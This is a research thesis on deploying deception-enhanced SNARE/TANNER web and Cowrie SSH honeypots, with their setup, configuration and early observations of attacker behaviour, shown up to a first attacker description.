LEARNING CYBERATTACK PATTERNS
WITH ACTIVE HONEYPOTS

by

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Honeypots can detect new attacks and vulnerabilities like zero-day exploits, based on an attacker’s behavior. Existing honeypots, however, are typically passive in nature and poor at detecting new and complex attacks like those carried out by state-sponsored actors. Deception is a commonly used tactic in conventional military operations, but it is rarely used in cyberspace. In this thesis, we implemented “active honeypots,” which incorporate deception into honeypot responses. In five phases of testing, we incorporated deception techniques such as fake files, defensive camouflage, delays, and false excuses into a Web honeypot built with SNARE and TANNER software, and an SSH honeypot built with Cowrie software.

Our experiments sought to investigate how cyberattackers respond to the deception techniques. Our results showed that most attackers performed only vulnerability scanning and fingerprinting of our honeypots. Some appeared to be performing horizontal scanning, accessing both honeypots in the same phase. We found that the attackers were primarily non-interactive and did not respond to customized deception. We also observed that attackers who established a non-interactive session might be unable to exit the session without external intervention. Thus, we can delay to penalize these attackers. We also discovered that some attackers used unusual means of transferring files to the SSH server, and we recommend exploring how deception can be used against such techniques.
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ABSTRACT

Honeypots can detect new attacks and vulnerabilities like zero-day exploits, based on an attacker’s behavior. Existing honeypots, however, are typically passive in nature and poor at detecting new and complex attacks like those carried out by state-sponsored actors. Deception is a commonly used tactic in conventional military operations, but it is rarely used in cyberspace. In this thesis, we implemented “active honeypots,” which incorporate deception into honeypot responses. In five phases of testing, we incorporated deception techniques such as fake files, defensive camouflage, delays, and false excuses into a Web honeypot built with SNARE and TANNER software, and an SSH honeypot built with Cowrie software.

Our experiments sought to investigate how cyberattackers respond to the deception techniques. Our results showed that most attackers performed only vulnerability scanning and fingerprinting of our honeypots. Some appeared to be performing horizontal scanning, accessing both honeypots in the same phase. We found that the attackers were primarily non-interactive and did not respond to customized deception. We also observed that attackers who established a non-interactive session might be unable to exit the session without external intervention. Thus, we can delay to penalize these attackers. We also discovered that some attackers used unusual means of transferring files to the SSH server, and we recommend exploring how deception can be used against such techniques.
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I. INTRODUCTION

All warfare is based on deception.

—Chinese strategist Sun Tzu, author of The Art of War

A honeypot is defined as “an information system resource whose value lies in unauthorized or illicit use of that resource” [1]. Unlike other forms of cyber defense mechanisms that focus on denying access by threats, the value of honeypots lies in attracting threats to use them. Without interaction from cyber attackers, honeypots have little value.

Deception is an important idea in implementing honeypots, as they are most effective in engaging the attacker and collecting information if they can make the attacker believe they are real systems [2]. Besides effectively concealing its nature, a honeypot should also sustain the interest of the attackers to continue their interaction so that attack tactics and techniques can be uncovered from these interactions.

A. OBJECTIVES

The objective of this thesis is to design, develop, and validate active honeypots that can employ a suite of deception techniques to respond to cyber attackers attempting to exploit them. The hypothesis is that deception techniques can better fool attackers into believing that the honeypot is a real computer system with vulnerabilities that can be exploited. Using deception techniques, we also hope to discover how the behavior of cyber attackers changes when they encounter obstacles. The information gathered can then be used to develop signatures for intrusion-detection and intrusion-prevention systems (IDPS), and deception techniques developed can be applied also on production systems to trick attackers into believing that they are honeypots that should be avoided.
B. RELEVANCE TO MILITARY DEFENSE

According to Ferdinando [3], “the vast global networks of the Defense Department are under constant attack, with the sophistication of the cyber assaults increasing. … The Department needs agile systems for the warfighter to stay ahead of an adversary that is evolving and moving.” Given the threat level faced by the United States Department of Defense, commercial products alone are insufficient to protect its computer networks. An innovative solution like honeypots is required to defend its networks against both state and non-state actors attempting to attack the networks.

The concept of deception is not new to the military and has been used extensively in many wars and battles to gain an advantage over the enemy by surprising them. The application of this concept to cyber defense, however, has been limited. Our research aims to incorporate deception techniques into cyber defense to gain early warnings of attack techniques and decrease the chances of a successful attack on a computer network. This research will present a multi-layered cyber defense against potential attacks by providing new capabilities to augment existing defense mechanisms.

C. THESIS ORGANIZATION

Chapter II briefly covers the background of honeypots, deception, and related work in these areas. It also provides a literature review of past honeypot projects. Chapter III defines the problems and lists the assumptions that we have made in the paper. Chapter IV discusses the design of our honeypot setup; its design considerations and objectives; and observations made regarding the data collected. Chapter V presents the adjustments made to the honeypots based on observations made during data collection, as well as further experiments incorporating additional deception techniques. It also summarizes the results. Chapter VI summarizes the research project and proposes possible future work to improve the current implementation.
II. BACKGROUND

A study by the University of Maryland's A. James Clark School of Engineering revealed that hacker attacks of computers with Internet access occur at an alarming rate of about once every 39 seconds [4]. Over the past decade, cyber attackers have continued to develop better tools and techniques that enable them to penetrate more complex systems and cause increased damage. With the increase in sophisticated attack methods, the need for an effective attack identification and defense mechanism becomes increasingly important.

A. HONEYPOTS

Honeypots are set up specifically to expend cyber-attacker resources [5] while simultaneously allowing defenders to gather information such as motives, techniques, and tactics about the attackers [6]. Honeypots can also confuse attackers when they provide unexpected responses to the attackers’ commands. After attackers gain access, honeypots can log the commands that the attackers attempt to execute on a system. Cybersecurity personnel can then study the logs to learn how the attackers gained access and how they tried to exploit the system. Countermeasures can then be developed to improve the protection of networks [7].

Honeypots can be classified into two main categories: research and production. Research honeypots gather intelligence about attack tactics by extensively logging information about connection attempts. This information can assist cybersecurity personnel in patching vulnerabilities in their systems, updating the signatures in their intrusion-prevention systems, or developing countermeasures against similar attacks. Production honeypots, on the other hand, imitate specific real services in an organization and serve as decoys helping to protect the organization.

Honeypots can be further categorized by the interaction level they provide to users. Low-interaction honeypots are simple network emulation tools offering limited service emulation [8]. When deployed within a network, they wait for incoming connections to record the initial steps of the connection attempt. Medium-interaction
honeypots allow more interactive activities such as uploading of files and manipulation of the file system. High-interaction honeypots are full, real systems and services used primarily to deceive and collect data about attack methods. Being real systems, high-interaction honeypots can fall under the control of attackers if they are successfully exploited. Thus, more care and effort are required to set up, maintain, and monitor these honeypots to ensure that attackers do not gain control of them.

B. DECEPTION IN CYBER DOMAIN

In [9], there are several chapters discussing deception techniques that can be applied in the cyber domain. These techniques could enhance honeypots to attract cyber attackers while effectively concealing their identities as honeypots.

1. Defensive Camouflage

A honeypot must effectively hide its identity to be able to deceive attackers that it is a genuine system. Cyber attackers typically fingerprint their target system to determine the vulnerabilities that can be exploited as well as if the target system is a honeypot. One example discussed in [10] describes how the Honeyd honeypot can be remotely fingerprinted by an attacker using the measured link latency of the network links emulated by it. Just as operating systems must have their vulnerabilities patched, a honeypot must have its signatures patched so that it cannot be easily identified as a honeypot.

2. Delays

Delays imposed upon an attacker are useful in providing time for analysis or investigation of suspicious activities [11]. As all cyber systems can occasionally encounter unexplained delays, attackers may not be suspicious of delayed responses to their commands. Delays can make it appear as if a system lacks processing ability, or a slow file transfer could make it appear that the system lacks network bandwidth. The delay can provide time to perform checks on files transferred onto the system.

For example, a network “tarpit” can use Transmission Control Protocol (TCP) flow-control mechanisms [12] to slow down attackers by holding their connections open,
while disallowing them from transferring data. This is achieved by the tarpit responding to a TCP SYN packet with a SYN/ACK and a small initial value for the 16-bit window field in the TCP header. It then locks the attacker in a fully established TCP connection by replying to incoming packets with a window size of zero, preventing the attacker from transmitting data to it. The tarpit further delays the attacker by ignoring the FIN packets when the attacker terminates the TCP connection and the attacker’s socket resources are consumed to keep the connection state until the FIN-WAIT duration expires. The attacker is unable to carry out any useful actions during the connection and his resources are wasted.

A honeypot can also employ the delay technique by pretending to do a very slow file transfer while checking for viruses and malware. This will help the honeypot decide how to deceive next.

3. Fakes

Many honeypot tools are generic enough to allow them to be deployed on many networks. Running a honeypot without making changes to its default configuration could make it easy to recognize by attackers. Putting fake objects in the honeypot can help improve its credibility as a legitimate system. Fakes can be used in the file system and the files. Fake files can be used as a bait to attract attackers who are looking for personal or corporate data. Fake files can also be substituted for files downloaded by the attackers to provide unexpected outcomes when the attackers try to execute them.

Another use for fakes is to make attackers paranoid. By creating files bearing the names of the user name of the login session, you could trick attackers into believing that their actions are being logged. This may encourage the attackers to try to cover their tracks and reveal more of their tactics and techniques.

4. False Excuses

Excuses in the form of error messages can be used by systems in response to commands that they cannot execute. As excuses can often be confusing or misleading, honeypots can use false excuses to prevent attackers from gaining access to certain
resources or completing certain actions. Ambiguous or confusing excuses will encourage attackers to waste time overcoming their perceived error.

C. **PREVIOUS WORK WITH HONEYPOT DECEPTION**

There have been several attempts to use deception to improve the effectiveness of honeypots. For example, [2] improved the Glastopf honeypot with a content-management system to produce dynamic Web pages to simulate real Web pages. This decreased the likelihood of attackers noticing it was a honeypot. A random delay to responses of a Web portal [13] made it appear that the input from the attacker was slowing down the site.

Honeypots help in network security to catch network intruders by studying their techniques of gaining footholds on systems [14]. Several HTTP and SSH [15] honeypot tools can be used. Web application honeypots that are available include HIHAT [16], DShield Web Honeypot Project [17], the Google Hack Honeypot [18], and Glastopf [19]. Glastopf is an open-source HTTP tool that can perform vulnerability-type emulation. As a Web server, it advertises itself with multiple attack surfaces to attract attackers. Glastopf performs classification and handles each incoming attack with a response based on the attackers’ attempted exploits on the Web applications and gives them the expected results. Figure 1 shows the general functionality of Glastopf.

![Figure 1. General functionality of Glastopf. Source: [19].](image-url)
The work [19] mentioned that many attackers use a file called ‘id’ to check the vulnerability of the victim’s system to exploitation. The attacker performs some commands to retrieve the victim’s system information. A honeypot can return a response that will encourage the attacker to attack the system further. A vulnerability emulator in Glastopf will generate responses based on vulnerability type (e.g., remote-file inclusion, local-file inclusion, or SQL injection) rather than acknowledging the actual system vulnerabilities to convince the attacker that the system is vulnerable [2]. As the Web-page template is simple and static in nature, the attacker can easily suspect that it is a honeypot, so there is a need to improve its camouflage.

Glastopf was succeeded by SNARE [20], which has many of the same features as Glastopf as well as the ability to convert existing Web pages into attack surfaces with TANNER [20]. SNARE is an abbreviation for Super Next generation Advanced Reactive HonEypot. Every event sent from SNARE to TANNER is evaluated, and TANNER decides how SNARE should respond to the client. This allows the honeypot to produce dynamic responses, which improve its camouflage.

Kippo [21] is a pioneer SSH honeypot. It is a medium-interaction honeypot that emulates SSH services and logs attacks and attacker commands. Yet, Kippo is not being maintained, and Cowrie [22] has replaced it. Cowrie has several additional functionalities including SFTP and SCP support for file upload, support for SSH exec commands, logging of direct-TCP connection attempts, ability to forward SMTP connections to SMTP honeypots, logging in JSON format, and shell commands that return a better response to the attacker. Betts [23] ran Cowrie for seven days and found that many automated login attempts used tools or botnets, as shown by passwords that were being tried day after day. A composite blocking-list lookup on one of the attacker’s IP addresses also showed that it had been infected with a spam-sending Trojan, a malicious link, or some form of botnet and had been attempting to break into other sites with brute-force password guessing.

The work [24] attempted to find out what cyber attackers do once they gain access to a server by deliberating disclosing apparently sensitive login information such as the private SSH key of their Cowrie SSH honeypot. After two weeks of running the
honeypot, however, they were unable to find any attackers using the disclosed SSH key to access the Cowrie honeypot. In their first phase where username-password authentication was implemented on Cowrie, attackers had few successes as they mainly relied on brute force attack. After two weeks, they concluded that their attackers typically transferred binary files from the attackers’ servers to the honeypot, tried to install hacking tools, ran scripts to fingerprint the honeypot, and covered their tracks.

The work [25] studied whether the inclusion of realistic files and folder structures affected the attackers’ behavior. They found that bots and humans reacted differently to the files and folders. Most of the attackers, which are bots, had little interest in finding and exfiltrating the files. Human attackers, on the other hand, although just a mere 14%, do inspect and interact with the files and folders.
III. PROBLEM DEFINITION AND ASSUMPTIONS

Honeypots are typically passive in nature and are poor at detecting new and complex attacks such as those carried out by state-sponsored actors. In addition, attackers can easily detect and avoid honeypots through their signatures if no deception techniques are implemented on the honeypots. For honeypots to be effective, we can implement active honeypots that use deception to cleverly respond to attackers and trick them into believing that the honeypots are real systems that are vulnerable to their attack and can be compromised so that the attacker has complete control over the system.

For our study, we studied implementations of an SSH honeypot and a Web honeypot. We assumed that traffic to the honeypots would mainly be bots (automated attackers) and script kiddies (amateur human attackers). Both are likely to execute templated commands on the honeypots to attempt to fingerprint the system and eventually to control it. Sophisticated commands entered into the honeypot would likely be an experienced cyber attacker attempting to compromise and gain control of the system.

This thesis aims to determine if the application of deception techniques to honeypots improves their ability to better engage cyber attackers and lead them into revealing their attack tactics and techniques. In addition, by running a Web honeypot and an SSH honeypot in parallel on the same host, we sought to determine if cyber attackers use different vectors in their attempts to attack the same host.
IV. METHODOLOGY

A. TOOL SETS

In this chapter, we will describe the honeypot tools that we have chosen and implemented. We chose SNARE and TANNER as our Web application honeypots and Cowrie as our SSH honeypot. This thesis explores the effectiveness of the different deception techniques that we deployed on them. We first recorded attacks on the honeypots with no deception techniques deployed and used this as our baseline. Subsequently, we implemented various deception techniques.

B. SNARE AND TANNER

SNARE generates vulnerabilities in Web-application servers that an unauthorized user can access and possibly exploit. Each of these vulnerabilities is known as an “attack surface” [20]. TANNER analyzes and classifies the attacks received from SNARE, evaluates them, and responds based on configured rules [20]. TANNER can classify attacks based on their signatures as LFI (Local File Injection), RFI (Remote File Injection), XSS (Cross-site Scripting), CMD_EXEC (Command Execution) and SQLI (Structured Query Language Injection).

When fingerprinted by attackers, SNARE shows that it is an Nginx [26] Web application server. It requires Web contents to serve as a website. It comes with a Python program clone.py that allows the cloning of a website. We chose the Monterey Navy Flying Club and cloned its full website.

TANNER uses Redis [27] as its database server to store the external Web traffic retrieved by SNARE. Redis is open-source software and uses in-memory data structures to store its database. TANNER can be additionally configured to store its data in JSON (JavaScript Object Notation) format into MongoDB. MongoDB is open-source software, and its data is stored as a collection of JSON documents instead of tables and rows as in a traditional database. The commands used to install SNARE and TANNER are detailed in Appendix A and B.
C. COWRIE

Cowrie is an SSH honeypot based on the Kippo honeypot [22]. It uses a virtual filesystem to simulate the Debian 5.0 operating system. Its SSH server was configured as “SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u2.” To make the attackers believe that Cowrie and SNARE were residing on the same server, we configured the hostname of the SSH server to be NginxWeb and added the Nginx default index page to the virtual filesystem. The message of the day for the SSH server was changed so that a security warning is displayed to users who log into the SSH server interactively. The commands used to install Cowrie are detailed in Appendix C.

Cowrie simulates execution of more than a dozen common Linux commands such as help, ls, and wget. These commands provide basic camouflage for the honeypot. If attackers transfer and execute a file within Cowrie, it will first store the file into a default download folder named “dl” in the virtual machine for later inspection. The “dl” folder is not accessible by the attackers as it is outside of the Cowrie application; this helps to prevent malicious code from being executed. It will also create a fake file with the same name as the transferred file in Cowrie and replace the file transferred by the attackers with the fake file so that the attackers can still see that a file has been transferred and be encouraged to continue their attacks.

Cowrie logs the attackers’ actions in both MySQL [28] and log files. It has a user-friendly Web interface called Kippo-Graph [29] to display the information in graphical form.

D. DATA ANALYSIS

1. Kippo-Graph

Kippo-Graph is a visualization tool originally developed for the Kippo SSH honeypot and has since been adapted to work with Cowrie. Kippo-Graph displays the information listed in Table 1 in a graphical format in the Web interface.
Table 1. Statistics from the Kippo-Graph Web interface.

<table>
<thead>
<tr>
<th>No</th>
<th>Activities</th>
<th>Descriptions</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>Total login attempts</td>
<td>The total number of attempts made to Cowrie</td>
</tr>
<tr>
<td>2</td>
<td>Distinct source IP addresses</td>
<td>The number of unique IP addresses that accessed Cowrie</td>
</tr>
<tr>
<td>3</td>
<td>Active time period</td>
<td>The start time and end time of attacks made to Cowrie</td>
</tr>
<tr>
<td>4</td>
<td>Top 10 passwords</td>
<td>The top 10 passwords that attackers use when accessing Cowrie</td>
</tr>
<tr>
<td>5</td>
<td>Top 10 usernames</td>
<td>The top 10 usernames that attackers used when accessing Cowrie</td>
</tr>
<tr>
<td>6</td>
<td>Top 10 user-pass combos</td>
<td>The top 10 username and passwords that attackers used when accessing Cowrie</td>
</tr>
<tr>
<td>7</td>
<td>Success ratio</td>
<td>The percentage of successful logins into Cowrie</td>
</tr>
<tr>
<td>8</td>
<td>Successes per day</td>
<td>The number of successful logins into Cowrie per day</td>
</tr>
<tr>
<td>9</td>
<td>Connection per IP address</td>
<td>The number of connections made by the top 10 IP addresses</td>
</tr>
<tr>
<td>10</td>
<td>Top 20 successful logins from the same IP address</td>
<td>The number of successful logins by the top 20 IP addresses</td>
</tr>
<tr>
<td>11</td>
<td>Top 20 probes per day</td>
<td>The top 20 number of probes per day</td>
</tr>
<tr>
<td>12</td>
<td>Top 10 SSH clients</td>
<td>The top 10 SSH clients that the attackers used when accessing Cowrie</td>
</tr>
<tr>
<td>13</td>
<td>Total number of commands</td>
<td>The total number of commands made to Cowrie</td>
</tr>
<tr>
<td>14</td>
<td>Total number of distinct commands</td>
<td>The total number of distinct commands made to Cowrie</td>
</tr>
<tr>
<td>15</td>
<td>Total number of downloads</td>
<td>The total number of downloads that the attackers made in Cowrie</td>
</tr>
<tr>
<td>16</td>
<td>Total number of distinct downloads</td>
<td>The total number of distinct downloads that the attackers made in Cowrie</td>
</tr>
<tr>
<td>17</td>
<td>Top 20 human activity per day</td>
<td>The top 20 number of commands made to Cowrie per day</td>
</tr>
<tr>
<td>18</td>
<td>Top 10 input (successful and failed)</td>
<td>The top 10 inputs (successful and failed)</td>
</tr>
<tr>
<td>No</td>
<td>Activities</td>
<td>Descriptions</td>
</tr>
<tr>
<td>----</td>
<td>---------------------</td>
<td>-------------------------------------------------------------------</td>
</tr>
<tr>
<td>19</td>
<td>wget commands</td>
<td>The wget commands that the attackers made in Cowrie</td>
</tr>
<tr>
<td>20</td>
<td>Executed scripts</td>
<td>The executed commands made in Cowrie</td>
</tr>
</tbody>
</table>

Kippo-Graph has a log-display page where inputs from attackers and responses from Cowrie are shown for a quick view of an attacker’s session. The original Kippo-Graph could only play logs stored in the database and not the inputs to Cowrie when attackers did not log in through an interactive shell. We have modified the code so that it could play all the logs made to Cowrie regardless of the attacker’s access method. We also added code to capture the duration of login sessions, the number of inputs entered into Cowrie during a session, and the average inputs per second. We computed MD5 hashes of the inputs so that we can easily identify identical inputs. The modified code is detailed in Appendix D.

Kippo-Graph with Maxmind [30] also provides a pie-chart visualization of the ten most common IP addresses and their geolocation. An intensity map with different shades of color that give the volume of attacks per country shows where the attacks are coming from. The commands used to install Kippo-Graph are detailed in Appendix E.

2. **SNARE**

SNARE provides a basic Web interface that displays the number of attack sessions, total duration, and the frequency of types of attacks. SNARE also provides further information such as IPs, ports, user agents, start and end times, paths, and attack types on each individual session. As we ran both Cowrie and SNARE on the server, we wanted to check if any attackers accessed both. We modified the Kippo-Graph code to also display the IP addresses that accessed both Cowrie and SNARE. The modified code is shown in Appendix D.

We felt that the Kippo-Graph Web interface was easier for data analysis, so we modified Kippo-Graph to display SNARE information in graphical form, which we called “SNARE-Graph.” SNARE-Graph displays the information listed in Table 2.
Besides SNARE-GRAPH, we also created a Web interface similar to the Kippo-Graph play log that displays the IP addresses, start and end times, the duration of sessions, paths accessed by the attackers, the type of attacks perceived by SNARE, and the user agents of the attackers. The code is given in Appendix D.

Table 2. Statistics from the SNARE-Graph Web interface.

<table>
<thead>
<tr>
<th>No</th>
<th>Activities</th>
<th>Descriptions</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>Total sessions</td>
<td>The total number of attempts made to SNARE</td>
</tr>
<tr>
<td>2</td>
<td>Distinct source IP addresses</td>
<td>The number of unique IP addresses that accessed SNARE</td>
</tr>
<tr>
<td>3</td>
<td>Active time period</td>
<td>The start date and time and the end date and time of attacks made to SNARE</td>
</tr>
<tr>
<td>4</td>
<td>Connection per IP address</td>
<td>The number of connections made by the top 10 IP addresses</td>
</tr>
<tr>
<td>5</td>
<td>Top 10 paths</td>
<td>The top 10 most common paths accessed by the attackers</td>
</tr>
<tr>
<td>6</td>
<td>Top 10 user agents</td>
<td>The top 10 most common user agents that the attackers used when accessing Cowrie</td>
</tr>
<tr>
<td>7</td>
<td>Attack types</td>
<td>The type of attacks used by the attackers</td>
</tr>
</tbody>
</table>

E. SETUP

We used an Internet line provided by NPS that is outside NPS’s firewall and allowed users from outside to scan our honeypots. The SNARE and Cowrie honeypots were on a virtual machine running on a static IP address bridged from the host machine. The host machine also had a static IP address, and the two static addresses were connected to the Internet line.
We ran TANNER and the database servers for the SNARE and Cowrie honeypots on another virtual machine. This virtual machine was not connected to the Internet to allow us to mitigate and control the extent of damage should the Internet-facing virtual machine get compromised. The data analysis was performed on a virtual machine running the administrative Web interfaces, and thru the interfaces, we could review the data collected by the SNARE, TANNER and the Cowrie honeypots. Figure 2 shows the network architecture of our implementation.

Figure 2. Network architecture for experimental honeypots.

F. MACHINE INFORMATION

The host machine was a Dell workstation, and three virtual machines were deployed on the host machine. Details are provided in Table 3.
Table 3. Machine specifications for experimental honeypots.

<table>
<thead>
<tr>
<th>Host Machine</th>
<th></th>
</tr>
</thead>
<tbody>
<tr>
<td>Processor</td>
<td>Intel Core i7-6700 CPU @ 3.40 GHz</td>
</tr>
<tr>
<td>Memory</td>
<td>16.0 GB</td>
</tr>
<tr>
<td>Storage</td>
<td>1 TB</td>
</tr>
<tr>
<td>Operating System</td>
<td>Windows 10</td>
</tr>
<tr>
<td>IP Address</td>
<td>X.X.X.A (External)</td>
</tr>
<tr>
<td></td>
<td>192.168.194.1 (VMnet 1)</td>
</tr>
</tbody>
</table>

<table>
<thead>
<tr>
<th>SNARE and Cowrie Virtual Machine</th>
<th></th>
</tr>
</thead>
<tbody>
<tr>
<td>Processor</td>
<td>1 Single Core Virtual Processor</td>
</tr>
<tr>
<td>Memory</td>
<td>4 GB</td>
</tr>
<tr>
<td>Storage</td>
<td>20 GB</td>
</tr>
<tr>
<td>Operating System</td>
<td>Ubuntu 16.04.3</td>
</tr>
<tr>
<td>IP Address</td>
<td>X.X.X.B (External)</td>
</tr>
<tr>
<td></td>
<td>*.128 (To connect to Host Machine and TANNER and Database Virtual Machine)</td>
</tr>
<tr>
<td>Protocol and Port</td>
<td>TCP 22 (Cowrie)</td>
</tr>
<tr>
<td></td>
<td>TCP 80 (SNARE)</td>
</tr>
</tbody>
</table>

<table>
<thead>
<tr>
<th>TANNER and Database Virtual Machine</th>
<th></th>
</tr>
</thead>
<tbody>
<tr>
<td>Processor</td>
<td>1 Single Core Virtual Processor</td>
</tr>
<tr>
<td>Memory</td>
<td>4 GB</td>
</tr>
<tr>
<td>Storage</td>
<td>20 GB</td>
</tr>
<tr>
<td>Operating System</td>
<td>Ubuntu 16.04.3</td>
</tr>
<tr>
<td>IP Address</td>
<td>X.X.X.C (Only enabled when performing software update)</td>
</tr>
<tr>
<td></td>
<td>*.129 (To connect to Host Machine and SNARE and Cowrie Virtual Machine)</td>
</tr>
<tr>
<td>Protocol and Port</td>
<td>TCP 3306 (MySQL)</td>
</tr>
<tr>
<td></td>
<td>TCP 6379 (Redis)</td>
</tr>
<tr>
<td></td>
<td>TCP 8090 (TANNER Core Application)</td>
</tr>
<tr>
<td></td>
<td>TCP 27017 (MongoDB)</td>
</tr>
</tbody>
</table>

<table>
<thead>
<tr>
<th>Data Analysis Virtual Machine</th>
<th></th>
</tr>
</thead>
<tbody>
<tr>
<td>Processor</td>
<td>1 Single Core Virtual Processor</td>
</tr>
<tr>
<td>Memory</td>
<td>4 GB</td>
</tr>
<tr>
<td>Storage</td>
<td>20 GB</td>
</tr>
<tr>
<td>Operating System</td>
<td>Ubuntu 16.04.3</td>
</tr>
<tr>
<td>IP Address</td>
<td>N.A</td>
</tr>
<tr>
<td>Protocol and Port</td>
<td>TCP 80 (PHP web interface to display Cowrie and SNARE traffic information)</td>
</tr>
<tr>
<td></td>
<td>TCP 3306 (MySQL)</td>
</tr>
<tr>
<td></td>
<td>TCP 6379 (Redis)</td>
</tr>
<tr>
<td></td>
<td>TCP 27017 (MongoDB)</td>
</tr>
</tbody>
</table>
G. BACKUP AND RESTORE SCRIPTS

To facilitate data analysis through the phases, we wrote a backup and a restore script. Once a phase concluded, we ran the script to back up the Cowrie MySQL database, logs, transferred files, and the SNARE Mongo and Redis databases and copy this information onto the data-analysis virtual machine. This script clears the previously loaded information and restores the selected data accordingly. The scripts are detailed in Appendix F.
V. EXPERIMENTS AND ANALYSIS OF RESULTS

This chapter reports results from the Web Honeypot and the SSH Honeypot used for experiments. It highlights observations about changes to attackers’ behavior in response to the deception techniques implemented on the honeypots. Data was collected in two phases. In Phase 1, the Web Honeypot (SNARE and TANNER) and the SSH Honeypot (Cowrie) were deployed with minimal changes and configuration. In Phase 2, deception techniques were employed. To collect a usable sample size while maintaining novelty of the deception technique, the experiments were run for two weeks each time. Table 4 details the timeline for implementation of deception techniques for the honeypots and the data collection.

Table 4. Implementation of deception techniques and data collection timeline.

<table>
<thead>
<tr>
<th>Time Period</th>
<th>Information</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>Phase 1 – Unmodified Honeypots (Data Collection: February 15, 2018 to February 28, 2018)</strong></td>
<td></td>
</tr>
<tr>
<td>Feb 15, 2018 @ 1505hrs</td>
<td>Started SNARE and Cowrie honeypots. Ready to accept connection.</td>
</tr>
<tr>
<td>Feb 15, 2018 @ 1527hrs</td>
<td>Cowrie received the first attack.</td>
</tr>
<tr>
<td>Feb 16, 2018 @ 0450hrs</td>
<td>SNARE received the first attack.</td>
</tr>
<tr>
<td>Feb 28, 2018 @ 1105hrs</td>
<td>SNARE received the last attack.</td>
</tr>
<tr>
<td>Feb 28, 2018 @ 1119hrs</td>
<td>Cowrie received the last attack.</td>
</tr>
<tr>
<td>Feb 28, 2018 @ 1119hrs</td>
<td>Stopped SNARE and Cowrie honeypots to collect logs and database data.</td>
</tr>
<tr>
<td><strong>Phase 2A – Fake Files and Defensive Camouflage (Data Collection: May 15, 2018 to May 29, 2018)</strong></td>
<td></td>
</tr>
<tr>
<td>May 15, 2018 @ 1356hrs</td>
<td>Started SNARE and Cowrie honeypots. Ready to accept connection.</td>
</tr>
<tr>
<td>May 15, 2018 @ 1357hrs</td>
<td>Cowrie received the first attack.</td>
</tr>
<tr>
<td>May 15, 2018 @ 1435hrs</td>
<td>SNARE received the first attack.</td>
</tr>
<tr>
<td>May 29, 2018 @ 1140hrs</td>
<td>SNARE received the last attack.</td>
</tr>
<tr>
<td>May 29, 2018 @ 1427hrs</td>
<td>Cowrie received the last attack.</td>
</tr>
<tr>
<td>May 29, 2018 @ 1427hrs</td>
<td>Stopped SNARE and Cowrie honeypots to collect logs and database data.</td>
</tr>
<tr>
<td><strong>Phase 2B – Delay (Data Collection: June 11, 2018 to July 10, 2018)</strong></td>
<td></td>
</tr>
<tr>
<td>May 30, 2018 to Jun 10, 2018</td>
<td>Implementation of delay deception in Cowrie.</td>
</tr>
<tr>
<td>Jun 11, 2018 @ 1217hrs</td>
<td>Started Cowrie honeypot. Ready to accept connection.</td>
</tr>
<tr>
<td>Jun 11, 2018 @ 1219hrs</td>
<td>Cowrie received the first attack.</td>
</tr>
</tbody>
</table>
A. PHASE 1—UNMODIFIED HONEYPOTS

In this phase, we implemented the SNARE and Cowrie honeypots to appear to be running on the same server. We wanted to see if the attackers would input commands in Cowrie to modify the Web contents of SNARE if they happened to notice both. As SNARE would be fingerprinted by the attackers as an, Nginx server, we modified the Cowrie hostname to NginxWeb and created a user Nginx and a default Nginx index file in the Cowrie fake filesystem. To make it more believable, we also modified the “service” command in Cowrie so that the attacker would see “Nginx” as a running service.

1. Default Configurations

   a. SNARE and TANNER

   Not many configurations can be changed in SNARE and TANNER. Nonetheless, the emulators (SQLI, RFI, LFI, XSS and CMD_EXEC) that are in in TANNER are more configurable, and we configured them to record the attack type. The emulators use pre-
coded pattern matching algorithms to determine if the paths that the attackers are accessing match the attack types configured in TANNER. If so, TANNER will record it as an attack. The Web pages in SNARE are static HTML pages, and no content such as forms or login pages requires attacker interaction. We configured SNARE to run on port 80 since that is the most common port for a Web server.

**b. Cowrie**

Cowrie has a configuration page that allows users to make changes to the default configuration. Table 5 displays the configuration items that we used.

<table>
<thead>
<tr>
<th>No</th>
<th>Configuration</th>
<th>Description</th>
<th>Default</th>
<th>Phase 1</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>Hostname</td>
<td>The hostname for Cowrie which will be displayed by the Cowrie shell prompt to attackers.</td>
<td>Svr04</td>
<td>NginxWeb</td>
</tr>
<tr>
<td>2</td>
<td>Interactive Timeout</td>
<td>The number of seconds before logged sessions terminate for being idle.</td>
<td>180</td>
<td>180</td>
</tr>
<tr>
<td>3</td>
<td>Auth_Class</td>
<td>This can be UserDB which uses the password database or AuthRandom which randomly allows attackers to log in after 2, 5, or 10 attempts.</td>
<td>UserDB</td>
<td>UserDB</td>
</tr>
<tr>
<td>4</td>
<td>Version</td>
<td>The SSH version returned to attackers.</td>
<td>SSH-2.0-OpenSSH_6.0p1Debian-4+deb7u2</td>
<td>SSH-2.0-OpenSSH_6.0p1Debian-4+deb7u2</td>
</tr>
<tr>
<td>5</td>
<td>Listen_endpoints</td>
<td>The port and interface on which Cowrie will be listening</td>
<td>TCP 2222 Interface 0.0.0.0</td>
<td>TCP 22 Interface 0.0.0.0</td>
</tr>
<tr>
<td>No</td>
<td>Configuration</td>
<td>Description</td>
<td>Default</td>
<td>Phase 1</td>
</tr>
<tr>
<td>----</td>
<td>---------------</td>
<td>-------------</td>
<td>---------</td>
<td>---------</td>
</tr>
<tr>
<td></td>
<td></td>
<td>for incoming SSH connections.</td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
| 6  | Output_mysql | The MySQL logging module, which is disabled by default. | Host = localhost  
Database = Cowrie  
Username = Cowrie  
Password = Secret  
Port = 3306 | Host = *.129  
Database = Cowrie  
Username = Cowrie  
Password = Cowrie  
Port = 3306 |

2. Observations—Cowrie and SNARE

a. IP Addresses that Accessed Both SNARE and Cowrie

We observed that out of the 584 distinct IP addresses that accessed Cowrie and the 77 distinct IP addresses that accessed SNARE, only five IP addresses accessed both honeypots (Figure 3, generated by SNARE-Graph).

Figure 3. IP addresses of attackers accessing both Cowrie and SNARE honeypots.
IP address A: This attacker accessed both Cowrie and SNARE once on February 23, 2018 @ 20:56:54 and February 18, 2018 @ 01:02:45 respectively. They only did a scan and did not proceed to log in to Cowrie. They accessed only the root directory on SNARE and did no further actions.

